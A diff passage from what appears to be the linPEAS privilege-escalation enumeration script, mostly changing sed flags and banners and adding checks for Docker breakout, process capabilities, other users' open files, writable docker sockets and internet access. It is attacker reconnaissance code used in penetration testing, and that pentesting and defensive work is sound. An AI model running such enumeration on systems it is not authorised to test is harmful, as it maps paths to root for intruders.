-la {} \; 2>/dev/null` + dockercontainer=`grep -i docker /proc/self/cgroup 2>/dev/null; grep -i kubepods /proc/self/cgroup 2>/dev/null; find / -maxdepth 3 -name "*dockerenv*" -exec ls -la {} \; 2>/dev/null` lxccontainer=`grep -qa container=lxc /proc/1/environ 2>/dev/null` - if [ "$dockercontainer" ]; then echo "Looks like we're in a Docker container" | sed -E "s,.*,${C}[1;31m&${C}[0m,"; - elif [ "$lxccontainer" ]; then echo "Looks like we're in a LXC container" | sed -E "s,.*,${C}[1;31m&${C}[0m,"; + if [ "$dockercontainer" ]; then echo "Looks like we're in a Docker container" | sed -${E} "s,.*,${C}[1;31m&${C}[0m,"; + elif [ "$lxccontainer" ]; then echo "Looks like we're in a LXC container" | sed -${E} "s,.*,${C}[1;31m&${C}[0m,"; else echo_no fi @@ -1032,14 +1124,24 @@ if [ "`echo $CHECKS | grep SysI`" ]; then if [ "$dockercontainers" -ne "0" ]; then containerCounts="${containerCounts}docker($dockercontainers) "; fi if [ "$lxccontainers" -ne "0" ]; then containerCounts="${containerCounts}lxc($lxccontainers) "; fi if [ "$rktcontainers" -ne "0" ]; then containerCounts="${containerCounts}rkt($rktcontainers) "; fi - echo "Yes $containerCounts" | sed -E "s,.*,${C}[1;31m&${C}[0m," + echo "Yes $containerCounts" | sed -${E} "s,.*,${C}[1;31m&${C}[0m," # List any running containers - if [ "$dockercontainers" -ne "0" ]; then echo "Running Docker Containers" | sed -E "s,.*,${C}[1;31m&${C}[0m,"; docker ps | tail -n +2 2>/dev/null; echo ""; fi - if [ "$lxccontainers" -ne "0" ]; then echo "Running LXC Containers" | sed -E "s,.*,${C}[1;31m&${C}[0m,"; lxc list 2>/dev/null; echo ""; fi - if [ "$rktcontainers" -ne "0" ]; then echo "Running RKT Containers" | sed -E "s,.*,${C}[1;31m&${C}[0m,"; rkt list 2>/dev/null; echo ""; fi + if [ "$dockercontainers" -ne "0" ]; then echo "Running Docker Containers" | sed -${E} "s,.*,${C}[1;31m&${C}[0m,"; docker ps | tail -n +2 2>/dev/null; echo ""; fi + if [ "$lxccontainers" -ne "0" ]; then echo "Running LXC Containers" | sed -${E} "s,.*,${C}[1;31m&${C}[0m,"; lxc list 2>/dev/null; echo ""; fi + if [ "$rktcontainers" -ne "0" ]; then echo "Running RKT Containers" | sed -${E} "s,.*,${C}[1;31m&${C}[0m,"; rkt list 2>/dev/null; echo ""; fi + fi + echo "" + + if [ "$dockercontainer" ] || [ "$dockercontainers" -ne "0" ]; then + printf $Y"[+] "$GREEN"Looking for docker breakout techniques\n"$NC + printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation/docker-breakout\n"$NC + capsh --print 2>/dev/null | sed -${E} "s,$containercapsB,${C}[1;31m&${C}[0m,g" + echo "" + ls /var/run/docker.sock 2>/dev/null | sed "s,.*,${C}[1;31m&${C}[0m," + ls /run/docker.sock 2>/dev/null | sed "s,.*,${C}[1;31m&${C}[0m," + find / ! -path "/sys/*" -name "docker.sock" -o -name "docker.socket" 2>/dev/null | sed "s,.*,${C}[1;31m&${C}[0m," fi - echo "" echo "" if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi fi @@ -1049,7 +1151,7 @@ if [ "`echo $CHECKS | grep Devs`" ]; then ########################################### #---------------) Devices (---------------# ########################################### - printf $B"=========================================( "$GREEN"Devices"$B" )==========================================\n"$NC + printf $B"═════════════════════════════════════════╣ "$GREEN"Devices"$B" ╠══════════════════════════════════════════\n"$NC #-- 1D) sd in /dev printf $Y"[+] "$GREEN"Any sd*/disk* disk in /dev? (limit 20)\n"$NC @@ -1060,7 +1162,7 @@ if [ "`echo $CHECKS | grep Devs`" ]; then printf $Y"[+] "$GREEN"Unmounted file-system?\n"$NC printf $B"[i] "$Y"Check if you can mount umounted devices\n"$NC if [ -f "/etc/fstab" ]; then - cat /etc/fstab 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" | sed -E "s,$mountG,${C}[1;32m&${C}[0m,g" | sed -E "s,$notmounted,${C}[1;31m&${C}[0m," | sed -E "s,$mounted,${C}[1;34m&${C}[0m," | sed -E "s,$Wfolders,${C}[1;31m&${C}[0m," | sed -E "s,$mountpermsB,${C}[1;31m&${C}[0m,g" | sed -E "s,$mountpermsG,${C}[1;32m&${C}[0m,g" + cat /etc/fstab 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" | sed -${E} "s,$mountG,${C}[1;32m&${C}[0m,g" | sed -${E} "s,$notmounted,${C}[1;31m&${C}[0m," | sed -${E} "s,$mounted,${C}[1;34m&${C}[0m," | sed -${E} "s,$Wfolders,${C}[1;31m&${C}[0m," | sed -${E} "s,$mountpermsB,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$mountpermsG,${C}[1;32m&${C}[0m,g" else echo_not_found "/etc/fstab" fi @@ -1074,11 +1176,11 @@ if [ "`echo $CHECKS | grep AvaSof`" ]; then ########################################### #---------) Available Software (----------# ########################################### - printf $B"====================================( "$GREEN"Available Software"$B" )====================================\n"$NC + printf $B"════════════════════════════════════╣ "$GREEN"Available Software"$B" ╠════════════════════════════════════\n"$NC #-- 1AS) Useful software printf $Y"[+] "$GREEN"Useful software\n"$NC - which nmap aws nc ncat netcat nc.traditional wget curl ping gcc g++ make gdb base64 socat python python2 python3 python2.7 python2.6 python3.6 python3.7 perl php ruby xterm doas sudo fetch docker lxc rkt kubectl 2>/dev/null + which nmap aws nc ncat netcat nc.traditional wget curl ping gcc g++ make gdb base64 socat python python2 python3 python2.7 python2.6 python3.6 python3.7 perl php ruby xterm doas sudo fetch docker lxc ctr runc rkt kubectl 2>/dev/null echo "" #-- 2AS) Search for compilers @@ -1094,7 +1196,7 @@ if [ "`echo $CHECKS | grep ProCronSrvcsTmrsSocks`" ]; then #################################################### #-----) Processes & Cron & Services & Timers (-----# #################################################### - printf $B"================================( "$GREEN"Processes, Cron, Services, Timers & Sockets"$B" )================================\n"$NC + printf $B"══════════════════════════════╣ "$GREEN"Processes, Cron, Services, Timers & Sockets"$B" ╠════════════════════════════════\n"$NC #-- PCS) Cleaned proccesses printf $Y"[+] "$GREEN"Cleaned processes\n"$NC @@ -1104,26 +1206,43 @@ if [ "`echo $CHECKS | grep ProCronSrvcsTmrsSocks`" ]; then printf $B"[i] "$Y"Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-unix/privilege-escalation#processes\n"$NC if [ "$NOUSEPS" ]; then - print_ps | sed -E "s,$Wfolders,${C}[1;31m&${C}[0m,g" | sed -E "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed -E "s,$nosh_usrs,${C}[1;34m&${C}[0m," | sed -E "s,$rootcommon,${C}[1;32m&${C}[0m," | sed -E "s,$knw_usrs,${C}[1;32m&${C}[0m," | sed "s,$USER,${C}[1;95m&${C}[0m," | sed "s,root,${C}[1;31m&${C}[0m," | sed -E "s,$processesVB,${C}[1;31;103m&${C}[0m,g" | sed "s,$processesB,${C}[1;31m&${C}[0m," | sed -E "s,$processesDump,${C}[1;31m&${C}[0m," + print_ps | sed -${E} "s,$Wfolders,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed -${E} "s,$nosh_usrs,${C}[1;34m&${C}[0m," | sed -${E} "s,$rootcommon,${C}[1;32m&${C}[0m," | sed -${E} "s,$knw_usrs,${C}[1;32m&${C}[0m," | sed "s,$USER,${C}[1;95m&${C}[0m," | sed "s,root,${C}[1;31m&${C}[0m," | sed -${E} "s,$processesVB,${C}[1;31;103m&${C}[0m,g" | sed "s,$processesB,${C}[1;31m&${C}[0m," | sed -${E} "s,$processesDump,${C}[1;31m&${C}[0m," pslist=`print_ps` else - ps aux 2>/dev/null | grep -v "\[" | sort | grep -v "%CPU" | sed -E "s,$Wfolders,${C}[1;31m&${C}[0m,g" | sed -E "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed -E "s,$nosh_usrs,${C}[1;34m&${C}[0m," | sed -E "s,$rootcommon,${C}[1;32m&${C}[0m," | sed -E "s,$knw_usrs,${C}[1;32m&${C}[0m," | sed "s,$USER,${C}[1;95m&${C}[0m," | sed "s,root,${C}[1;31m&${C}[0m," | sed -E "s,$processesVB,${C}[1;31;103m&${C}[0m,g" | sed "s,$processesB,${C}[1;31m&${C}[0m," | sed -E "s,$processesDump,${C}[1;31m&${C}[0m," - pslist=`ps aux` + (ps fauxwww || ps auxwww | sort ) 2>/dev/null | grep -v "\[" | grep -v "%CPU" | while read psline; do + echo "$psline" | sed -${E} "s,$Wfolders,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed -${E} "s,$nosh_usrs,${C}[1;34m&${C}[0m," | sed -${E} "s,$rootcommon,${C}[1;32m&${C}[0m," | sed -${E} "s,$knw_usrs,${C}[1;32m&${C}[0m," | sed "s,$USER,${C}[1;95m&${C}[0m," | sed "s,root,${C}[1;31m&${C}[0m," | sed -${E} "s,$processesVB,${C}[1;31;103m&${C}[0m,g" | sed "s,$processesB,${C}[1;31m&${C}[0m," | sed -${E} "s,$processesDump,${C}[1;31m&${C}[0m," + if [ "`command -v capsh`" ] && ! [ "`echo \"$psline\" | grep root`" ]; then + cpid="`echo \"$psline\" | awk '{print $2}'`" + caphex=0x"`cat \"/proc/$cpid/status\" 2> /dev/null | grep \"CapEff\" | awk '{print $2}'`" + if [ "$caphex" ] && [ "$caphex" != "0x" ] && [ "`echo \"$caphex\" | grep -v '0x0000000000000000'`" ]; then + printf " └─(${DG}Caps${NC}) "; capsh --decode=$caphex 2>/dev/null | sed -${E} "s,$capsB,${C}[1;31m&${C}[0m,g" + fi + fi + done + pslist=`ps auxwww` echo "" #-- PCS) Binary processes permissions printf $Y"[+] "$GREEN"Binary processes permissions\n"$NC printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#processes\n"$NC binW="IniTialiZZinnggg" - ps aux 2>/dev/null | awk '{print $11}' | while read bpath; do + ps auxwww 2>/dev/null | awk '{print $11}' | while read bpath; do if [ -w "$bpath" ]; then binW="$binW|$bpath" fi done - ps aux 2>/dev/null | awk '{print $11}' | xargs ls -la 2>/dev/null |awk '!x[$0]++' 2>/dev/null | sed -E "s,$Wfolders,${C}[1;31;103m&${C}[0m,g" | sed -E "s,$binW,${C}[1;31;103m&${C}[0m,g" | sed -E "s,$sh_usrs,${C}[1;31m&${C}[0m," | sed -E "s,$nosh_usrs,${C}[1;34m&${C}[0m," | sed -E "s,$knw_usrs,${C}[1;32m&${C}[0m," | sed "s,$USER,${C}[1;31m&${C}[0m," | sed "s,root,${C}[1;32m&${C}[0m," + ps auxwww 2>/dev/null | awk '{print $11}' | xargs ls -la 2>/dev/null |awk '!x[$0]++' 2>/dev/null | sed -${E} "s,$Wfolders,${C}[1;31;103m&${C}[0m,g" | sed -${E} "s,$binW,${C}[1;31;103m&${C}[0m,g" | sed -${E} "s,$sh_usrs,${C}[1;31m&${C}[0m," | sed -${E} "s,$nosh_usrs,${C}[1;34m&${C}[0m," | sed -${E} "s,$knw_usrs,${C}[1;32m&${C}[0m," | sed "s,$USER,${C}[1;31m&${C}[0m," | sed "s,root,${C}[1;32m&${C}[0m," fi echo "" + #-- PCS) Files opened by processes belonging to other users + if ! [ "$IAMROOT" ]; then + printf $Y"[+] "$GREEN"Files opened by processes belonging to other users\n"$NC + printf $B"[i] "$Y"This is usually empty because of the lack of privileges to read other user processes information\n"$NC + lsof 2>/dev/null | grep -v "$USER" | grep -iv "permission denied" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed "s,$USER,${C}[1;95m&${C}[0m," | sed -${E} "s,$nosh_usrs,${C}[1;34m&${C}[0m," | sed "s,root,${C}[1;31m&${C}[0m," + echo "" + fi + #-- PCS) Processes with credentials inside memory printf $Y"[+] "$GREEN"Processes with credentials in memory (root req)\n"$NC printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#credentials-from-process-memory\n"$NC @@ -1146,23 +1265,26 @@ if [ "`echo $CHECKS | grep ProCronSrvcsTmrsSocks`" ]; then #-- PCS) Cron printf $Y"[+] "$GREEN"Cron jobs\n"$NC printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#scheduled-cron-jobs\n"$NC - crontab -l 2>/dev/null | sed -E "s,$Wfolders,${C}[1;31;103m&${C}[0m,g" | sed -E "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed "s,$USER,${C}[1;95m&${C}[0m," | sed -E "s,$nosh_usrs,${C}[1;34m&${C}[0m," | sed "s,root,${C}[1;31m&${C}[0m," - ls -al /etc/cron* 2>/dev/null | sed -E "s,$cronjobsG,${C}[1;32m&${C}[0m,g" | sed "s,$cronjobsB,${C}[1;31m&${C}[0m,g" - cat /etc/cron* /etc/at* /etc/anacrontab /var/spool/cron/crontabs /var/spool/cron/crontabs/* /var/spool/anacron /etc/incron.d/* /var/spool/incron/* 2>/dev/null | grep -v "^#\|test \-x /usr/sbin/anacron\|run\-parts \-\-report /etc/cron.hourly\| root run-parts /etc/cron." | sed -E "s,$Wfolders,${C}[1;31;103m&${C}[0m,g" | sed -E "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed "s,$USER,${C}[1;95m&${C}[0m," | sed -E "s,$nosh_usrs,${C}[1;34m&${C}[0m," | sed "s,root,${C}[1;31m&${C}[0m," - crontab -l -u "$USER" 2>/dev/null + command -v crontab 2>/dev/null || echo_not_found "crontab" + crontab -l 2>/dev/null | tr -d "\r" | sed -${E} "s,$Wfolders,${C}[1;31;103m&${C}[0m,g" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed "s,$USER,${C}[1;95m&${C}[0m," | sed -${E} "s,$nosh_usrs,${C}[1;34m&${C}[0m," | sed "s,root,${C}[1;31m&${C}[0m," + command -v incrontab 2>/dev/null || echo_not_found "incrontab" + incrontab -l 2>/dev/null + ls -al /etc/cron* 2>/dev/null | sed -${E} "s,$cronjobsG,${C}[1;32m&${C}[0m,g" | sed "s,$cronjobsB,${C}[1;31m&${C}[0m,g" + cat /etc/cron* /etc/at* /etc/anacrontab /var/spool/cron/crontabs /var/spool/cron/crontabs/* /var/spool/anacron /etc/incron.d/* /var/spool/incron/* 2>/dev/null | tr -d "\r" | grep -v "^#\|test \-x /usr/sbin/anacron\|run\-parts \-\-report /etc/cron.hourly\| root run-parts /etc/cron." | sed -${E} "s,$Wfolders,${C}[1;31;103m&${C}[0m,g" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed "s,$USER,${C}[1;95m&${C}[0m," | sed -${E} "s,$nosh_usrs,${C}[1;34m&${C}[0m," | sed "s,root,${C}[1;31m&${C}[0m," + crontab -l -u "$USER" 2>/dev/null | tr -d "\r" ls -l /usr/lib/cron/tabs/ /Library/LaunchAgents/ /Library/LaunchDaemons/ ~/Library/LaunchAgents/ 2>/dev/null #MacOS paths echo "" #-- PCS) Services printf $Y"[+] "$GREEN"Services\n"$NC printf $B"[i] "$Y"Search for outdated versions\n"$NC - (service --status-all || chkconfig --list || rc-status) 2>/dev/null || launchctl list || echo_not_found "service|chkconfig|rc-status" + (service --status-all || service -e || chkconfig --list || rc-status || launchctl list) 2>/dev/null || echo_not_found "service|chkconfig|rc-status|launchctl" echo "" #-- PSC) systemd PATH printf $Y"[+] "$GREEN"Systemd PATH\n"$NC printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#systemd-path-relative-paths\n"$NC - systemctl show-environment 2>/dev/null | grep "PATH" | sed -E "s,$Wfolders\|\./\|\.:\|:\.,${C}[1;31;103m&${C}[0m,g" + systemctl show-environment 2>/dev/null | grep "PATH" | sed -${E} "s,$Wfolders\|\./\|\.:\|:\.,${C}[1;31;103m&${C}[0m,g" WRITABLESYSTEMDPATH=`systemctl show-environment 2>/dev/null | grep "PATH" | grep -E "$Wfolders"` echo "" @@ -1170,11 +1292,11 @@ if [ "`echo $CHECKS | grep ProCronSrvcsTmrsSocks`" ]; then #TODO: .service files in MACOS are folders printf $Y"[+] "$GREEN"Analyzing .service files\n"$NC printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#services\n"$NC - services=$(echo "$FIND_ETC $FIND_LIB $FIND_RUN $FIND_USR $FIND_SYSTEMD $FIND_SYSTEM $FIND_PRIVATE $FIND_VAR $FIND_SYS $FIND_SNAP" | grep -E '\.service') + services=$(echo "$FIND_ETC\n$FIND_LIB\n$FIND_RUN\n$FIND_USR\n$FIND_SYSTEMD\n$FIND_SYSTEM\n$FIND_PRIVATE\n$FIND_VAR\n$FIND_SYS\n$FIND_SNAP" | grep -E '\.service') printf "$services\n" | while read s; do if [ ! -O "$s" ]; then #Remove services that belongs to the current user if [ -w "$s" ] && [ -f "$s" ]; then - echo "$s" | sed -E "s,.*,${C}[1;31;103m&${C}[0m,g" + echo "$s" | sed -${E} "s,.*,${C}[1;31;103m&${C}[0m,g" fi servicebinpaths="`grep -Eo '^Exec.*?=[!@+-]*[a-zA-Z0-9_/\-]+' \"$s\" 2>/dev/null | cut -d '=' -f2 | sed 's,^[@\+!-]*,,'`" #Get invoked paths printf "$servicebinpaths\n" | while read sp; do @@ -1186,29 +1308,29 @@ if [ "`echo $CHECKS | grep ProCronSrvcsTmrsSocks`" ]; then relpath2="`grep -E '^Exec.*=.*/bin/[a-zA-Z0-9_]*sh ' \"$s\" 2>/dev/null | grep -Ev \"/[a-zA-Z0-9_]+/\"`" if [ "$relpath1" ] || [ "$relpath2" ]; then if [ "$WRITABLESYSTEMDPATH" ]; then - echo "$s is executing some relative path" | sed -E "s,.*,${C}[1;31m&${C}[0m,"; + echo "$s is executing some relative path" | sed -${E} "s,.*,${C}[1;31m&${C}[0m,"; else echo "$s is executing some relative path" fi fi fi done - if [ ! "$WRITABLESYSTEMDPATH" ]; then echo "You can't write on systemd PATH" | sed -E "s,.*,${C}[1;32m&${C}[0m,"; fi + if [ ! "$WRITABLESYSTEMDPATH" ]; then echo "You can't write on systemd PATH" | sed -${E} "s,.*,${C}[1;32m&${C}[0m,"; fi echo "" #-- PSC) Timers printf $Y"[+] "$GREEN"System timers\n"$NC printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#timers\n"$NC - (systemctl list-timers --all 2>/dev/null | grep -Ev "(^$|timers listed)" | sed -E "s,$timersG,${C}[1;32m&${C}[0m,") || echo_not_found + (systemctl list-timers --all 2>/dev/null | grep -Ev "(^$|timers listed)" | sed -${E} "s,$timersG,${C}[1;32m&${C}[0m,") || echo_not_found echo "" #-- PSC) .timer files printf $Y"[+] "$GREEN"Analyzing .timer files\n"$NC printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#timers\n"$NC - timers=$(echo "$FIND_ETC $FIND_LIB $FIND_RUN $FIND_USR $FIND_SYSTEMD $FIND_SYSTEM $FIND_PRIVATE $FIND_VAR $FIND_SYS $FIND_SNAP" | grep -E '\.timer') + timers=$(echo "$FIND_ETC\n$FIND_LIB\n$FIND_RUN\n$FIND_USR\n$FIND_SYSTEMD\n$FIND_SYSTEM\n$FIND_PRIVATE\n$FIND_VAR\n$FIND_SYS\n$FIND_SNAP" | grep -E '\.timer') printf "$timers\n" | while read t; do if [ -w "$t" ]; then - echo "$t" | sed -E "s,.*,${C}[1;31m&${C}[0m,g" + echo "$t" | sed -${E} "s,.*,${C}[1;31m&${C}[0m,g" fi timerbinpaths="`grep -Po '^Unit=*(.*?$)' \"$t\" 2>/dev/null | cut -d '=' -f2`" printf "$timerbinpaths\n" | while read tb; do @@ -1227,7 +1349,7 @@ if [ "`echo $CHECKS | grep ProCronSrvcsTmrsSocks`" ]; then #TODO: .socket files in MACOS are folders printf $Y"[+] "$GREEN"Analyzing .socket files\n"$NC printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#sockets\n"$NC - sockets=$(echo "$FIND_ETC $FIND_LIB $FIND_RUN $FIND_USR $FIND_SYSTEMD $FIND_SYSTEM $FIND_PRIVATE $FIND_VAR $FIND_SYS $FIND_SNAP" | grep -E '\.socket') + sockets=$(echo "$FIND_ETC\n$FIND_LIB\n$FIND_RUN\n$FIND_USR\n$FIND_SYSTEMD\n$FIND_SYSTEM\n$FIND_PRIVATE\n$FIND_VAR\n$FIND_SYS\n$FIND_SNAP" | grep -E '\.socket') printf "$sockets\n" | while read s; do if [ -w "$s" ] && [ -f "$s" ]; then echo "Writable .socket file: $s" | sed "s,/.*,${C}[1;31m&${C}[0m,g" @@ -1247,6 +1369,9 @@ if [ "`echo $CHECKS | grep ProCronSrvcsTmrsSocks`" ]; then if [ -w "/var/run/docker.sock" ]; then echo "Docker socket /var/run/docker.sock is writable (https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-docker-socket)" | sed "s,/var/run/docker.sock is writable,${C}[1;31;103m&${C}[0m,g" fi + if [ -w "/run/docker.sock" ]; then + echo "Docker socket /run/docker.sock is writable (https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-docker-socket)" | sed "s,/var/run/docker.sock is writable,${C}[1;31;103m&${C}[0m,g" + fi done echo "" @@ -1257,7 +1382,7 @@ if [ "`echo $CHECKS | grep ProCronSrvcsTmrsSocks`" ]; then socketcurl="`curl --max-time 2 --unix-socket \"$s\" http:/index 2>/dev/null`" if [ $? -eq 0 ]; then owner="`ls -l \"$s\" | cut -d ' ' -f 3`" - echo "Socket $s owned by $owner uses HTTP. Response to /index:" | sed -E "s,$groupsB,${C}[1;31m&${C}[0m,g" | sed -E "s,$groupsVB,${C}[1;31m&${C}[0m,g" | sed -E "s,$sh_usrs,${C}[1;96m&${C}[0m,g" | sed "s,$USER,${C}[1;95m&${C}[0m,g" | sed -E "s,$nosh_usrs,${C}[1;34m&${C}[0m,g" | sed -E "s,$knw_usrs,${C}[1;32m&${C}[0m,g" | sed "s,root,${C}[1;31m&${C}[0m," | sed -E "s,$knw_grps,${C}[1;32m&${C}[0m,g" | sed -E "s,$idB,${C}[1;31m&${C}[0m,g" + echo "Socket $s owned by $owner uses HTTP. Response to /index:" | sed -${E} "s,$groupsB,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$groupsVB,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m,g" | sed "s,$USER,${C}[1;95m&${C}[0m,g" | sed -${E} "s,$nosh_usrs,${C}[1;34m&${C}[0m,g" | sed -${E} "s,$knw_usrs,${C}[1;32m&${C}[0m,g" | sed "s,root,${C}[1;31m&${C}[0m," | sed -${E} "s,$knw_grps,${C}[1;32m&${C}[0m,g" | sed -${E} "s,$idB,${C}[1;31m&${C}[0m,g" echo "$socketcurl" fi done @@ -1271,20 +1396,20 @@ if [ "`echo $CHECKS | grep ProCronSrvcsTmrsSocks`" ]; then printf "$dbusfols\n" | while read d; do for f in $d/*; do if [ -w "$f" ]; then - echo "Writable $f" | sed -E "s,.*,${C}[1;31m&${C}[0m,g" + echo "Writable $f" | sed -${E} "s,.*,${C}[1;31m&${C}[0m,g" fi genpol=`grep "" "$f" 2>/dev/null` - if [ "$genpol" ]; then printf "Weak general policy found on $f ($genpol)\n" | sed -E "s,$sh_usrs,${C}[1;96m&${C}[0m,g" | sed "s,$USER,${C}[1;31m&${C}[0m,g" | sed -E "s,$nosh_usrs,${C}[1;34m&${C}[0m,g" | sed -E "s,$mygroups,${C}[1;31m&${C}[0m,g"; fi + if [ "$genpol" ]; then printf "Weak general policy found on $f ($genpol)\n" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m,g" | sed "s,$USER,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$nosh_usrs,${C}[1;34m&${C}[0m,g" | sed -${E} "s,$mygroups,${C}[1;31m&${C}[0m,g"; fi #if [ "`grep \"\" \"$f\" 2>/dev/null`" ]; then printf "Possible weak user policy found on $f () \n" | sed "s,$USER,${C}[1;31m&${C}[0m,g"; fi userpol=`grep "/dev/null | grep -v "root"` - if [ "$userpol" ]; then printf "Possible weak user policy found on $f ($userpol)\n" | sed -E "s,$sh_usrs,${C}[1;96m&${C}[0m,g" | sed "s,$USER,${C}[1;31m&${C}[0m,g" | sed -E "s,$nosh_usrs,${C}[1;34m&${C}[0m,g" | sed -E "s,$mygroups,${C}[1;31m&${C}[0m,g"; fi + if [ "$userpol" ]; then printf "Possible weak user policy found on $f ($userpol)\n" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m,g" | sed "s,$USER,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$nosh_usrs,${C}[1;34m&${C}[0m,g" | sed -${E} "s,$mygroups,${C}[1;31m&${C}[0m,g"; fi #for g in `groups`; do # if [ "`grep \"\" \"$f\" 2>/dev/null`" ]; then printf "Possible weak group ($g) policy found on $f\n" | sed "s,$g,${C}[1;31m&${C}[0m,g"; fi #done grppol=`grep "/dev/null | grep -v "root"` - if [ "$grppol" ]; then printf "Possible weak user policy found on $f ($grppol)\n" | sed -E "s,$sh_usrs,${C}[1;96m&${C}[0m,g" | sed "s,$USER,${C}[1;31m&${C}[0m,g" | sed -E "s,$nosh_usrs,${C}[1;34m&${C}[0m,g" | sed -E "s,$mygroups,${C}[1;31m&${C}[0m,g"; fi + if [ "$grppol" ]; then printf "Possible weak user policy found on $f ($grppol)\n" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m,g" | sed "s,$USER,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$nosh_usrs,${C}[1;34m&${C}[0m,g" | sed -${E} "s,$mygroups,${C}[1;31m&${C}[0m,g"; fi #TODO: identify allows in context="default" done @@ -1297,7 +1422,7 @@ if [ "`echo $CHECKS | grep ProCronSrvcsTmrsSocks`" ]; then dbuslist=$(busctl list 2>/dev/null) if [ "$dbuslist" ]; then busctl list | while read line; do - echo "$line" | sed -E "s,$dbuslistG,${C}[1;32m&${C}[0m,g"; + echo "$line" | sed -${E} "s,$dbuslistG,${C}[1;32m&${C}[0m,g"; if [ ! "`echo \"$line\" | grep -E \"$dbuslistG\"`" ]; then srvc_object=`echo $line | cut -d " " -f1` srvc_object_info=`busctl status "$srvc_object" 2>/dev/null | grep -E "^UID|^EUID|^OwnerUID" | tr '\n' ' '` @@ -1320,7 +1445,7 @@ if [ "`echo $CHECKS | grep Net`" ]; then ########################################### #---------) Network Information (---------# ########################################### - printf $B"===================================( "$GREEN"Network Information"$B" )====================================\n"$NC + printf $B"═══════════════════════════════════╣ "$GREEN"Network Information"$B" ╠════════════════════════════════════\n"$NC #-- NI) Hostname, hosts and DNS printf $Y"[+] "$GREEN"Hostname, hosts and DNS\n"$NC @@ -1353,7 +1478,7 @@ if [ "`echo $CHECKS | grep Net`" ]; then #-- NI) Ports printf $Y"[+] "$GREEN"Active Ports\n"$NC printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-ports\n"$NC - (netstat -punta || ss --ntpu || (netstat -a -p tcp && netstat -a -p udp) | grep -i listen) 2>/dev/null | sed -E "s,127.0.[0-9]+.[0-9]+,${C}[1;31m&${C}[0m," + ((netstat -punta || ss -ntpu || (netstat -a -p tcp && netstat -a -p udp)) | grep -i listen) 2>/dev/null | sed -${E} "s,127.0.[0-9]+.[0-9]+,${C}[1;31m&${C}[0m," echo "" #-- NI) tcpdump @@ -1361,18 +1486,18 @@ if [ "`echo $CHECKS | grep Net`" ]; then timeout 1 tcpdump >/dev/null 2>&1 if [ $? -eq 124 ]; then #If 124, then timed out == It worked printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#sniffing\n"$NC - echo "You can sniff with tcpdump!" | sed -E "s,.*,${C}[1;31m&${C}[0m," + echo "You can sniff with tcpdump!" | sed -${E} "s,.*,${C}[1;31m&${C}[0m," else echo_no fi echo "" #-- NI) Internet access - if ! [ "$SUPERFAST" ] && ! [ "$NOTEXPORT" ] && [ -f "/bin/bash" ]; then + if ! [ "$SUPERFAST" ] && ! [ "$FAST" ] && ! [ "$NOTEXPORT" ] && [ "$TIMEOUT" ] && [ -f "/bin/bash" ]; then printf $Y"[+] "$GREEN"Internet Access?\n"$NC - check_tcp_80 & - check_tcp_443 & - check_icmp & - timeout 10 /bin/bash -c '(( echo cfc9 0100 0001 0000 0000 0000 0a64 7563 6b64 7563 6b67 6f03 636f 6d00 0001 0001 | xxd -p -r >&3; dd bs=9000 count=1 <&3 2>/dev/null | xxd ) 3>/dev/udp/1.11.1.1/53 && echo "DNS available" || echo "DNS not available") 2>/dev/null | grep "available"' 2>/dev/null & + check_tcp_80 2>/dev/null & + check_tcp_443 2>/dev/null & + check_icmp 2>/dev/null & + check_dns 2>/dev/null & wait echo "" fi @@ -1385,27 +1510,31 @@ if [ "`echo $CHECKS | grep UsrI`" ]; then ########################################### #----------) Users Information (----------# ########################################### - printf $B"====================================( "$GREEN"Users Information"$B" )=====================================\n"$NC + printf $B"════════════════════════════════════╣ "$GREEN"Users Information"$B" ╠════════════════════════════════════\n"$NC #-- UI) My user printf $Y"[+] "$GREEN"My user\n"$NC printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#users\n"$NC - (id || (whoami && groups)) 2>/dev/null | sed -E "s,$groupsB,${C}[1;31m&${C}[0m,g" | sed -E "s,$groupsVB,${C}[1;31;103m&${C}[0m,g" | sed -E "s,$sh_usrs,${C}[1;96m&${C}[0m,g" | sed "s,$USER,${C}[1;95m&${C}[0m,g" | sed -E "s,$nosh_usrs,${C}[1;34m&${C}[0m,g" | sed -E "s,$knw_usrs,${C}[1;32m&${C}[0m,g" | sed "s,root,${C}[1;31m&${C}[0m," | sed -E 